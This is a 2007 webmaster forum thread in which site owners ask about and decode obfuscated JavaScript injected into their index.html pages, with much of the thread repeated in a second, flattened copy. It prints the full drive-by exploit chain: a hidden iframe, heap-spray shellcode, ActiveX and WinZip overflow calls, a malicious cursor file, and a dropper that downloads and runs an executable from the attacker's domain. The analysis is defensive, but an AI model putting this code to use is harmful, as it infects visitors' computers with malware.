What is this malicious injected code all about? - GoFuckYourself.com

d-null · 11-21-2007, 09:15 AM

I've seen this a few times in the last couple months. What does this code do that someone is injecting into the index.html code for many sites? I've cleaned it out before only to have it return again a month later. Why and how are they injecting this code?

this is what it looks like, and it seemed to try to run outlook express on one site, the other nothing seemed to happen:

<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>

who · 11-21-2007, 09:19 AM

Unescape() and escape() can be used to encode/decode parts of a script or URL or so on.

justFred · 11-21-2007, 09:20 AM

It looks to me initially that it is trying to send some data to the hacker via e-mail.

who · 11-21-2007, 09:20 AM

In your case its:

document.write('<iframe src=http://softspydelete.com/strong /050/ width=1 heght=1></iframe>');

yahoo-xxx-girls.com · 11-21-2007, 09:21 AM

Quote:

Originally Posted by jetjet

I've seen this a few times in the last couple months. What does this code do that someone is injecting into the index.html code for many sites? I've cleaned it out before only to have it return again a month later. Why and how are they injecting this code?

this is what it looks like, and it seemed to try to run outlook express on one site, the other nothing seemed to happen:

<script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>

Your code converts to this:

<script>eval(unescape(document.write('<iframe src=http://softspydelete.com/strong/050/ width=1 height=1></iframe>');));</script>

.

d-null · 11-21-2007, 09:23 AM

interesting, thanks for the replies

it's on a shared account

is there anything I should do as a user to protect against it? (permissions or something?) ...or is it something that the server admin should be taking care of?

what could a hacker possibly be hoping to achieve by injecting that in many index files (I noticed the same code in other accounts on the same server)

d-null · 11-21-2007, 09:30 AM

interesting too, the whois for that domain shows a Russian owner with a Turkish IP

yahoo-xxx-girls.com · 11-21-2007, 09:42 AM

http://softspydelete.com/strong/050/ (Points to the below)

<script>

var aTDnc='ae77613122a3db26313c68746d6c3e0a3c626f64793 e3c7374796c653e202a207b435552534f523a2075726c28223 332343132332e68746d6c22297d203c2f7374796c653e0a3c6 96672616d65207372633d2265312e68746d6c2220776964746 83d223122206865696768743d2231223e3c2f696672616d653 e3c2f626f64793e0a3c2f68746d6c3e3abe68ad57';
eval(unescape('%76%61%72%20%71%31%47%70%79%20%3d%2 0%27%27%3b%0a%76%61%72%20%4d%56%35%76%20%3d%20%61% 54%44%6e%63%2e%73%6c%69%63%65%20%28%20%31%38%2c%20 %32%37%34%20%29%3b%0a%66%6f%72%20%28%20%63%36%20%3 d%20%31%38%20%3b%20%63%36%20%3c%20%32%37%34%20%3b% 20%63%36%20%2b%3d%20%32%20%29%7b%0a%09%71%31%47%70 %79%20%2b%3d%20%27%25%27%20%2b%20%61%54%44%6e%63%2 e%73%6c%69%63%65%20%28%20%63%36%2c%20%63%36%20%2b% 20%32%20%29%3b%0a%7d%64%6f%63%75%6d%65%6e%74%2e%77 %72%69%74%65%28%75%6e%65%73%63%61%70%65%28%71%31%4 7%70%79%29%29%3b'));</script>

( below is how it breaks down )

--------------

var aTDnc='®wa1"£Û&1<html><body><style> * {CURSOR: url("324123.html")} </style><iframe src="e1.html" width="1" height="1"></iframe></body></html>:¾hhaW'

eval(unescape('var q1Gpy = ''; var MV5v = aTDnc.slice ( 18, 274 ); for ( c6 = 18 ; c6 < 274 ; c6 += 2 ){q1Gpy += '%' + aTDnc.slice ( c6, c6 + 2 );}document.write(unescape(q1Gpy));�'));</script>

-----

Now ( 324123.html )

RIFF��ACONanih$��$��ÿÿ��
��TSIL��TSIL�� anih¨�� ¢@� 1ÉfÁ8ë^ëèøÿÿÿ?Æ ?.Fâúê_?ï/Bê??+Bêwtnoqp0fnnêä?Å?KBêWTN FqypnqcfVqHkngCUê¾LBllêe<^dqqv0kpzS lÒ?8Blêe<^dqqv0kpzê??@Blês Nqc fNkdtct{CYkpGzgeGzkvRtqeguujvvr<1142;03820940:2 1921PQVGRCF0GZG b ê_?ïÉBf2]]]
?Ü??ZB}>ÙazMu"}&ØÙþ¯ÒSY?¿KB»õ¨? a[vIIäæíÆ3Âh ÃâuØÈ¯Ò??^BcÅR·ZB?^BâIgvRtqeCff tguuüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü ü

------

And ( e1.html )

<html>
<body><div id="mydiv"></div><Script Language='JavaScript'>
var mm = new Array();
var mem_flag = 0;

function h() {mm=mm; setTimeout("h()", 2000);}

function getb(b, bSize)
{while (b.length*2<bSize){b += b;}
b = b.substring(0,bSize/2);return b;}

function cf()
{var zc = 0x05050505;
var a = unescape("%u9090%u9090%u9090%u9090%u00e8%u0000%u5d 00%ued81%u11ca%u0040%ucbe8%u0000%u8d00%u5a85%u4012 %ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011d%u 0000%uc389%u858d%u1319%u0040%u13e8%u0000%u5500%u4c 52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041 %ue853%u00f7%u0000%u9090%u8d8d%u127a%u0040%u006a%u 006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078%u6a 51%uff00%u8dd0%u6785%u4012%u6a00%ue800%u0009%u0000 %u3a63%u745c%u692e%u786e%ue800%u00bd%u0000%u858d%u 126f%u0040%u006a%ub0e8%u0000%u4c00%u616f%u4c64%u62 69%u6172%u7972%u0041%u6957%u456e%u6578%u0063%u7845 %u7469%u6854%u6572%u6461%u6800%u7474%u3a70%u2f2f%u 6f73%u7466%u7073%u6479%u6c65%u7465%u2e65%u6f63%u2f 6d%u6c64%u302f%u3035%u772f%u6e69%u3233%u652e%u6578 %u1d00%u0030%u0000%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u 8908%u89da%u289d%u4013%u8b00%u3c7b%ud701%u5f03%u8b 78%u184b%u738b%u8b20%u247b%ud601%ud701%uadfc%ud001 %u5751%u8d96%u19bd%u4013%ub900%u000f%u0000%ua6f3%u 5f96%u7459%u4706%ue247%uebe4%u31c4%u66c0%u078b%ue0 c1%u8b02%u1c73%ud601%uc601%u01ad%u89d0%u2c85%u4013 %u6100%u50c3%ub5ff%u1328%u0040%u95ff%u132c%u0040%u e0ff%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u00 00%u0000%u0000%u0000%u9000");
var heapBl2ckSize = 0x400000;
var pls = a.length * 2;
var bSize = heapBl2ckSize - (pls+0x38);
var b = unescape("%u0505%u0505"); b = getb(b,bSize);
heapBl2cks = (zc - 0x400000)/heapBl2ckSize;

for (i=0;i<heapBl2cks;i++)
{mm[i] = b + a;}

mem_flag = 1;
return mm;
}

function startWVF()
{
for (i=0;i<128;i++)
{
try{
var tar = new ActiveXObject('WebVi'+'ewFol'+'de'+'rIc'+'on.WebVi '+'ewFol'+'derI'+'con.1');
d = 0x7ffffffe;
b = 0x05050505
tar.setSlice(d, b, b, b );
}catch(e){}
}
}

function startWinZip(object)
{
var xh = 'A';
while (xh.length < 231) xh+='A';
xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c";
object.CreateNewFolderFromName(xh);
}

function startOverflow(num)
{
try {
var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+' ewFol'+'derI'+'con.1');
if (tar) {
if (! mem_flag) cf();
startWVF();
}
} catch(e) { }
}

function GetRandString(len)
{
var chars = "abcdefghiklmnopqrstuvwxyz";
var string_length = len;
var randomstring = '';
for (var i=0; i<string_length; i++) {
var rnum = Math.floor(Math.random() * chars.length);
randomstring += chars.substring(rnum,rnum+1);
}

return randomstring;
}

function CreateObject(CLSID, name) {
var r = null;
try { eval('r = CLSID.CreateObject(name)') }catch(e){}
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject("", name)') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name, "")') }catch(e){} }
if (!r) { try {s=1; eval('r = CLSID.GetObject(name)') }catch(e){} }
return(r);
}

function XMLHttpDownload(xml, url) {

try {
xml.open("GET", url, false);
xml.send(null);

} catch(e) { return 0; }

return xml.responseBody;
}

function AD2BDStreamSave(o, name, data) {

try {
o.Type = 1;
o.Mode = 3;
o.Open();
o.Write(data);
o.SaveToFile(name, 2);
o.Close();
} catch(e) { return 0; }

return 1;
}

function ShellExecute(exec, name, type) {

if (type == 0) {
try { exec.Run(name, 0); return 1; } catch(e) { }
} else {
try { exe.ShellExecute(name); return 1; } catch(e) { }
}

return(0);

}

function MD2C() {
var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', '{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null);
var v = new Array(null, null, null);
var i = 0;
var n = 0;
var ret = 0;
var urlRealExe = 'http://softspydelete.com/dl/050/win32.exe';

while (t[i] && (! v[0] || ! v[1] || ! v[2]) ) {
var a = null;

try {
a = document.createElement("object");
a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1));
} catch(e) { a = null; }

if (a) {
if (! v[0]) {
v[0] = CreateObject(a, "msxml2.XMLHTTP");
if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP");
if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP");
}

if (! v[1]) {
v[1] = CreateObject(a, "ADOD"+"B.Str"+"eam");
}

if (! v[2]) {
v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell");
if (! v[2]) {
v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on");
if (v[2]) n=1;
}
}
}

i++;
}

if (v[0] && v[1] && v[2]) {
var data = XMLHttpDownload(v[0], urlRealExe);
if (data != 0) {
var name = "c:\\sys"+GetRandString(4)+".exe";
if (AD2BDStreamSave(v[1], name, data) == 1) {
if (ShellExecute(v[2], name, n) == 1) {
ret=1;
}
}
}
}

return ret;
}

function start() {

if (! MD2C() ) { startOverflow(0); }

}

start();
</script></body>
</html>

StarkReality · 11-21-2007, 09:47 AM

Ok, so the short version means: A trojan (installer) using activex to sneak on the system, disguised as a windows system file ?!

d-null · 11-21-2007, 09:49 AM

awesome followthrough

so anyone have any theories to what they would be trying to achieve with this?

I just went and checked another server at a completely different data center and found the same code (or similar code, I deleted it before analyzing it exactly)

ClickBuster · 11-21-2007, 09:50 AM

that IFRAME is loading a page, that executes an exploit, that uploads a trojan... it's much better to redirect to a 3rd party page in case you want to update your exploit code... nasty shit, dealt with something similar a few weeks ago, had to cleanse several thousand pages

SmokeyTheBear · 11-21-2007, 09:53 AM

Quote:

Originally Posted by jetjet

awesome followthrough

so anyone have any theories to what they would be trying to achieve with this?

I just went and checked another server at a completely different data center and found the same code (or similar code, I deleted it before analyzing it exactly)

infecting people with spyware.

is the code hardwritten into the page ( like do you see it by ftp or only by browser )

d-null · 11-21-2007, 09:56 AM

the code made it hardwritten into my index.html files on completely separate datacenters

yahoo-xxx-girls.com · 11-21-2007, 09:57 AM

---------------------------------------------------------

http://softspydelete.com

softspydelete.com. NS 3600 ns2.trdns.biz.
softspydelete.com. NS 3600 ns1.trdns.biz.
softspydelete.com. A 3600 88.255.90.253

----------------

Searching for ns1.trdns.biz. A record at B.ROOT-SERVERS.NET. [192.228.79.201] ...took 156 ms
Searching for ns1.trdns.biz. A record at A.GTLD.biz. [209.173.53.162] ...took 93 ms
Searching for ns1.trdns.biz. A record at NS2.trdns.biz. [88.255.90.252] ...took 120 ms

A record found: 88.255.90.251
Domain Type TTL Answer
ns1.trdns.biz. A 3600 88.255.90.251

----------------

----------------

Searching for ns1.trdns.biz. A record at E.ROOT-SERVERS.NET. [192.203.230.10] ...took 177 ms
Searching for ns1.trdns.biz. A record at H.GTLD.biz. [199.7.77.126] ...took 10 ms
Searching for ns1.trdns.biz. A record at ns1.trdns.biz. [88.255.90.251] ...took 120 ms

A record found: 88.255.90.251
Domain Type TTL Answer
ns1.trdns.biz. A 3600 88.255.90.251

----------------

yahoo-xxx-girls.com · 11-21-2007, 10:00 AM

Quote:

Originally Posted by jetjet

awesome followthrough

so anyone have any theories to what they would be trying to achieve with this?

I just went and checked another server at a completely different data center and found the same code (or similar code, I deleted it before analyzing it exactly)

Perhaps a root kit as to attack others systems or perhaps spam...

.

Spudman · 11-21-2007, 10:06 AM

Quote:

Originally Posted by jetjet

the code made it hardwritten into my index.html files on completely separate datacenters

i have been getting this code for about a month now and have only just resolved the issue with webair's help. if you simply remove the code from your index pages it comes back, did with me anyways.

i think it came from an exploit in a script was using, i have removed the script and remade all affected webpages and its fine so far, fingers crossed

yahoo-xxx-girls.com · 11-21-2007, 10:10 AM

Spudman how exactly did this code get onto webair servers to begin with ?

.

ClickBuster · 11-21-2007, 10:18 AM

Quote:

Originally Posted by Balalsubturfyooj

Spudman how exactly did this code get onto webair servers to begin with ?

.

He said that he had a vulnerable script

Spudman · 11-21-2007, 10:20 AM

Quote:

Originally Posted by Balalsubturfyooj

Spudman how exactly did this code get onto webair servers to begin with ?

.

i dunno balal, i got a dedicated box, the code got on it somehow, i think through one of the scripts i use, and i got on every index.html page i have and if i removed it, it simply came back, at first it seemed to just bring up the outlook.exe popup but then it really started fucking my pages up so i've practically deleted everything and started again.

the scripts i was running on my box were:
e107
comus
TM3
TTTv4
and some photo gallery software.

maybe through one of those,

i've checked and ammended any permissions on all my pages, also renamed all templates that come with scripts(i should have done this before anyways, just lazy

) and so far i seem clean again.

yahoo-xxx-girls.com · 11-21-2007, 10:59 AM

Perhaps someone attached a misc code to a image file?

If you run a virus scanner on your server it might be a good idea...

Later,

RegUser · 11-21-2007, 05:23 PM

I remember a similar code infecting tonnes of sites out there. It reinfects html pages within days if cleaned.
I was under the impression that it happens because of a vulnerability with windows virtual machine but am not sure how to prevent it. Does any one know what causes this and how to fix it.....keep in mind that it propgates via internet.

<script language="JavaScript">e = '0x00' + '56';str1 = "%ED%B5%BE%A3%C9%A4%A5%AE%BD%B2%EA%F7%A3%BE%A4 %BE%B7%BE%BD%BE%A5%AE%EF%B1%BE%B5%B5%B2%BB%F7%EB%E D%BE%B3%A7%B6%BA%B2%C9%A4%A7%B4%EA%F7%B1%A5%A5%B9% EF%F8%F8%A7%BE%BC%B8%B4%BB%A5%FB%BE%BB%B3%B8%F8%BD %B5%F8%B0%A7%B2%AE%F8%F7%C9%A0%BE%B5%A5%B1%EA%E6%C 9%B1%B2%BE%B0%B1%A5%EA%E6%EB%ED%F8%BE%B3%A7%B6%BA% B2%EB%ED%F8%B5%BE%A3%EB";str=tmp='';for(i=0;i<str1 .length;i+=3){tmp = unescape(str1.slice(i,i+3));str=str+String.fromCha rCode((tmp.charCodeAt(0)^e)-127);}document.write(str);</script>

AlienQ - BANNED FOR LIFE · 11-21-2007, 05:46 PM

I had the same problem for a while it isusually inserted via a database on your own server. Secure the Data sources or remove unused ones, clear the index.html.

I worked with SplitInfinity to solve my problem hit up your host and check with them to get it flushed.

minusonebit · 11-21-2007, 05:51 PM

Goddamn that is sneaky.

madfuck · 11-21-2007, 06:11 PM

idk, hummm i have NO idea???? good question

RegUser · 11-22-2007, 04:58 PM

i think it is an iframe that injects the code and resides as a .js file on the server.

11-21-2007, 09:15 AM	#1
d-null . . . Industry Role: Join Date: Apr 2007 Location: NY Posts: 13,724	What is this malicious injected code all about? I've seen this a few times in the last couple months. What does this code do that someone is injecting into the index.html code for many sites? I've cleaned it out before only to have it return again a month later. Why and how are they injecting this code? this is what it looks like, and it seemed to try to run outlook express on one site, the other nothing seemed to happen: <script>eval(unescape('%64%6f%63%75%6d%65%6e%74%2e %77%72%69%74%65%28%27%3c%69%66%72%61%6d%65%20%73%7 2%63%3d%68%74%74%70%3a%2f%2f%73%6f%66%74%73%70%79% 64%65%6c%65%74%65%2e%63%6f%6d%2f%73%74%72%6f%6e%67 %2f%30%35%30%2f%20%77%69%64%74%68%3d%31%20%68%65%6 9%67%68%74%3d%31%3e%3c%2f%69%66%72%61%6d%65%3e%27% 29%3b'));</script>

11-21-2007, 09:20 AM	#3
justFred Confirmed User Join Date: Mar 2007 Posts: 922	It looks to me initially that it is trying to send some data to the hacker via e-mail. __________________ Vote Bill Cosby 2012

11-21-2007, 09:20 AM	#4
who So Fucking Banned Join Date: Aug 2003 Location: ICQ #23642053 Posts: 19,593	In your case its: document.write('<iframe src=http://softspydelete.com/strong /050/ width=1 heght=1></iframe>'); Last edited by who; 11-21-2007 at 09:22 AM..

11-21-2007, 09:42 AM	#8
yahoo-xxx-girls.com Confirmed User Join Date: Jul 2006 Location: Canada Posts: 3,143	http://softspydelete.com/strong/050/ (Points to the below) <script> var aTDnc='ae77613122a3db26313c68746d6c3e0a3c626f64793 e3c7374796c653e202a207b435552534f523a2075726c28223 332343132332e68746d6c22297d203c2f7374796c653e0a3c6 96672616d65207372633d2265312e68746d6c2220776964746 83d223122206865696768743d2231223e3c2f696672616d653 e3c2f626f64793e0a3c2f68746d6c3e3abe68ad57'; eval(unescape('%76%61%72%20%71%31%47%70%79%20%3d%2 0%27%27%3b%0a%76%61%72%20%4d%56%35%76%20%3d%20%61% 54%44%6e%63%2e%73%6c%69%63%65%20%28%20%31%38%2c%20 %32%37%34%20%29%3b%0a%66%6f%72%20%28%20%63%36%20%3 d%20%31%38%20%3b%20%63%36%20%3c%20%32%37%34%20%3b% 20%63%36%20%2b%3d%20%32%20%29%7b%0a%09%71%31%47%70 %79%20%2b%3d%20%27%25%27%20%2b%20%61%54%44%6e%63%2 e%73%6c%69%63%65%20%28%20%63%36%2c%20%63%36%20%2b% 20%32%20%29%3b%0a%7d%64%6f%63%75%6d%65%6e%74%2e%77 %72%69%74%65%28%75%6e%65%73%63%61%70%65%28%71%31%4 7%70%79%29%29%3b'));</script> ( below is how it breaks down ) -------------- var aTDnc='®wa1"£Û&1<html><body><style> * {CURSOR: url("324123.html")} </style><iframe src="e1.html" width="1" height="1"></iframe></body></html>:¾hhaW' eval(unescape('var q1Gpy = ''; var MV5v = aTDnc.slice ( 18, 274 ); for ( c6 = 18 ; c6 < 274 ; c6 += 2 ){q1Gpy += '%' + aTDnc.slice ( c6, c6 + 2 );}document.write(unescape(q1Gpy));�'));</script> ----- Now ( 324123.html ) RIFF��ACONanih$��$��ÿÿ�� ��TSIL��TSIL�� anih¨�� ¢@� 1ÉfÁ8ë^ëèøÿÿÿ?Æ ?.Fâúê_?ï/Bê??+Bêwtnoqp0fnnêä?Å?KBêWTN FqypnqcfVqHkngCUê¾LBllêe<^dqqv0kpzS lÒ?8Blêe<^dqqv0kpzê??@Blês Nqc fNkdtct{CYkpGzgeGzkvRtqeguujvvr<1142;03820940:2 1921PQVGRCF0GZG b ê_?ïÉBf2]]] ?Ü??ZB}>ÙazMu"}&ØÙþ¯ÒSY?¿KB»õ¨? a[vIIäæíÆ3Âh ÃâuØÈ¯Ò??^BcÅR·ZB?^BâIgvRtqeCff tguuüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü üüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüüü ü ------ And ( e1.html ) <html> <body><div id="mydiv"></div><Script Language='JavaScript'> var mm = new Array(); var mem_flag = 0; function h() {mm=mm; setTimeout("h()", 2000);} function getb(b, bSize) {while (b.length2<bSize){b += b;} b = b.substring(0,bSize/2);return b;} function cf() {var zc = 0x05050505; var a = unescape("%u9090%u9090%u9090%u9090%u00e8%u0000%u5d 00%ued81%u11ca%u0040%ucbe8%u0000%u8d00%u5a85%u4012 %ue800%u0007%u0000%u7275%u6d6c%u6e6f%ue800%u011d%u 0000%uc389%u858d%u1319%u0040%u13e8%u0000%u5500%u4c 52%u6f44%u6e77%u6f6c%u6461%u6f54%u6946%u656c%u0041 %ue853%u00f7%u0000%u9090%u8d8d%u127a%u0040%u006a%u 006a%u09e8%u0000%u6300%u5c3a%u2e74%u6e69%u0078%u6a 51%uff00%u8dd0%u6785%u4012%u6a00%ue800%u0009%u0000 %u3a63%u745c%u692e%u786e%ue800%u00bd%u0000%u858d%u 126f%u0040%u006a%ub0e8%u0000%u4c00%u616f%u4c64%u62 69%u6172%u7972%u0041%u6957%u456e%u6578%u0063%u7845 %u7469%u6854%u6572%u6461%u6800%u7474%u3a70%u2f2f%u 6f73%u7466%u7073%u6479%u6c65%u7465%u2e65%u6f63%u2f 6d%u6c64%u302f%u3035%u772f%u6e69%u3233%u652e%u6578 %u1d00%u0030%u0000%u5b8b%u8b0c%u1c5b%u1b8b%u5b8b%u 8908%u89da%u289d%u4013%u8b00%u3c7b%ud701%u5f03%u8b 78%u184b%u738b%u8b20%u247b%ud601%ud701%uadfc%ud001 %u5751%u8d96%u19bd%u4013%ub900%u000f%u0000%ua6f3%u 5f96%u7459%u4706%ue247%uebe4%u31c4%u66c0%u078b%ue0 c1%u8b02%u1c73%ud601%uc601%u01ad%u89d0%u2c85%u4013 %u6100%u50c3%ub5ff%u1328%u0040%u95ff%u132c%u0040%u e0ff%u6547%u5074%u6f72%u4163%u6464%u6572%u7373%u00 00%u0000%u0000%u0000%u9000"); var heapBl2ckSize = 0x400000; var pls = a.length 2; var bSize = heapBl2ckSize - (pls+0x38); var b = unescape("%u0505%u0505"); b = getb(b,bSize); heapBl2cks = (zc - 0x400000)/heapBl2ckSize; for (i=0;i<heapBl2cks;i++) {mm[i] = b + a;} mem_flag = 1; return mm; } function startWVF() { for (i=0;i<128;i++) { try{ var tar = new ActiveXObject('WebVi'+'ewFol'+'de'+'rIc'+'on.WebVi '+'ewFol'+'derI'+'con.1'); d = 0x7ffffffe; b = 0x05050505 tar.setSlice(d, b, b, b ); }catch(e){} } } function startWinZip(object) { var xh = 'A'; while (xh.length < 231) xh+='A'; xh+="\x0c\x0c\x0c\x0c\x0c\x0c\x0c"; object.CreateNewFolderFromName(xh); } function startOverflow(num) { try { var tar = new ActiveXObject('WebVi'+'ewFol'+'derIc'+'on.WebVi'+' ewFol'+'derI'+'con.1'); if (tar) { if (! mem_flag) cf(); startWVF(); } } catch(e) { } } function GetRandString(len) { var chars = "abcdefghiklmnopqrstuvwxyz"; var string_length = len; var randomstring = ''; for (var i=0; i<string_length; i++) { var rnum = Math.floor(Math.random() * chars.length); randomstring += chars.substring(rnum,rnum+1); } return randomstring; } function CreateObject(CLSID, name) { var r = null; try { eval('r = CLSID.CreateObject(name)') }catch(e){} if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "")') }catch(e){} } if (!r) { try {s=1; eval('r = CLSID.CreateObject(name, "", "")') }catch(e){} } if (!r) { try {s=1; eval('r = CLSID.GetObject("", name)') }catch(e){} } if (!r) { try {s=1; eval('r = CLSID.GetObject(name, "")') }catch(e){} } if (!r) { try {s=1; eval('r = CLSID.GetObject(name)') }catch(e){} } return(r); } function XMLHttpDownload(xml, url) { try { xml.open("GET", url, false); xml.send(null); } catch(e) { return 0; } return xml.responseBody; } function AD2BDStreamSave(o, name, data) { try { o.Type = 1; o.Mode = 3; o.Open(); o.Write(data); o.SaveToFile(name, 2); o.Close(); } catch(e) { return 0; } return 1; } function ShellExecute(exec, name, type) { if (type == 0) { try { exec.Run(name, 0); return 1; } catch(e) { } } else { try { exe.ShellExecute(name); return 1; } catch(e) { } } return(0); } function MD2C() { var t = new Array('{BD96C5'+'56-65A3-11'+'D0-983A-00C04FC'+'29E30}', '{BD96C'+'556-65A3-11'+'D0-983A-00C0'+'4FC29E36}', '{AB9B'+'CEDD-EC7E-47'+'E1-9322-D4A21'+'0617116}', '{0006F'+'033-0000-0000-C000-000000'+'000046}', '{0006'+'F03A-0000-0000-C000-0000000'+'00046}', '{6e32'+'070a-766d-4ee6-879c-dc1fa'+'91d2fc3}', '{6414'+'512B-B978-451D-A0D8-FCFDF3'+'3E833C}', '{7F5B'+'7F63-F06F-4331-8A26-339E03'+'C0AE3D}', '{0672'+'3E09-F4C2-43'+'c8-8358-09FCD1D'+'B0766}', '{639F'+'725F-1B2D-48'+'31-A9FD-87484'+'7682010}', '{BA018'+'599-1DB3-44f'+'9-83B4-46145'+'4C84BF8}', '{D0C07'+'D56-7C69-43F1-B4'+'A0-25F5A1'+'1FAB19}', '{E8C'+'CCDDF-CA28-496b-B'+'050-6C07C962'+'476B}', null); var v = new Array(null, null, null); var i = 0; var n = 0; var ret = 0; var urlRealExe = 'http://softspydelete.com/dl/050/win32.exe'; while (t[i] && (! v[0] \|\| ! v[1] \|\| ! v[2]) ) { var a = null; try { a = document.createElement("object"); a.setAttribute("classid", "clsid:" + t[i].substring(1, t[i].length - 1)); } catch(e) { a = null; } if (a) { if (! v[0]) { v[0] = CreateObject(a, "msxml2.XMLHTTP"); if (! v[0]) v[0] = CreateObject(a, "Microso"+"ft.XM"+"LHT"+"TP"); if (! v[0]) v[0] = CreateObject(a, "MSX"+"ML2.Se"+"rverXM"+"LHT"+"TP"); } if (! v[1]) { v[1] = CreateObject(a, "ADOD"+"B.Str"+"eam"); } if (! v[2]) { v[2] = CreateObject(a, "WSc"+"ript.Sh"+"ell"); if (! v[2]) { v[2] = CreateObject(a, "Shel"+"l.Ap"+"pl"+"icati"+"on"); if (v[2]) n=1; } } } i++; } if (v[0] && v[1] && v[2]) { var data = XMLHttpDownload(v[0], urlRealExe); if (data != 0) { var name = "c:\\sys"+GetRandString(4)+".exe"; if (AD2BDStreamSave(v[1], name, data) == 1) { if (ShellExecute(v[2], name, n) == 1) { ret=1; } } } } return ret; } function start() { if (! MD2C() ) { startOverflow(0); } } start(); </script></body> </html> __________________ sig too big

11-21-2007, 09:50 AM	#11
ClickBuster Confirmed User Join Date: May 2004 Posts: 210	that IFRAME is loading a page, that executes an exploit, that uploads a trojan... it's much better to redirect to a 3rd party page in case you want to update your exploit code... nasty shit, dealt with something similar a few weeks ago, had to cleanse several thousand pages __________________ -- ClickBuster -- ICQ# 263653704 -- Email: clickbuster1 [-at-] gmail [-dot-] com

11-21-2007, 09:19 AM	#2
who So Fucking Banned Join Date: Aug 2003 Location: ICQ #23642053 Posts: 19,593	Unescape() and escape() can be used to encode/decode parts of a script or URL or so on.

11-21-2007, 09:23 AM	#6
d-null . . . Industry Role: Join Date: Apr 2007 Location: NY Posts: 13,724	interesting, thanks for the replies it's on a shared account is there anything I should do as a user to protect against it? (permissions or something?) ...or is it something that the server admin should be taking care of? what could a hacker possibly be hoping to achieve by injecting that in many index files (I noticed the same code in other accounts on the same server)

11-21-2007, 09:30 AM	#7
d-null . . . Industry Role: Join Date: Apr 2007 Location: NY Posts: 13,724	interesting too, the whois for that domain shows a Russian owner with a Turkish IP

11-21-2007, 09:47 AM	#9
StarkReality Confirmed User Join Date: May 2004 Location: 4 8 15 16 23 42 Posts: 4,444	Ok, so the short version means: A trojan (installer) using activex to sneak on the system, disguised as a windows system file ?!

11-21-2007, 09:49 AM	#10
d-null . . . Industry Role: Join Date: Apr 2007 Location: NY Posts: 13,724	awesome followthrough so anyone have any theories to what they would be trying to achieve with this? I just went and checked another server at a completely different data center and found the same code (or similar code, I deleted it before analyzing it exactly)

11-21-2007, 09:56 AM	#13
d-null . . . Industry Role: Join Date: Apr 2007 Location: NY Posts: 13,724	the code made it hardwritten into my index.html files on completely separate datacenters

11-21-2007, 09:57 AM	#14
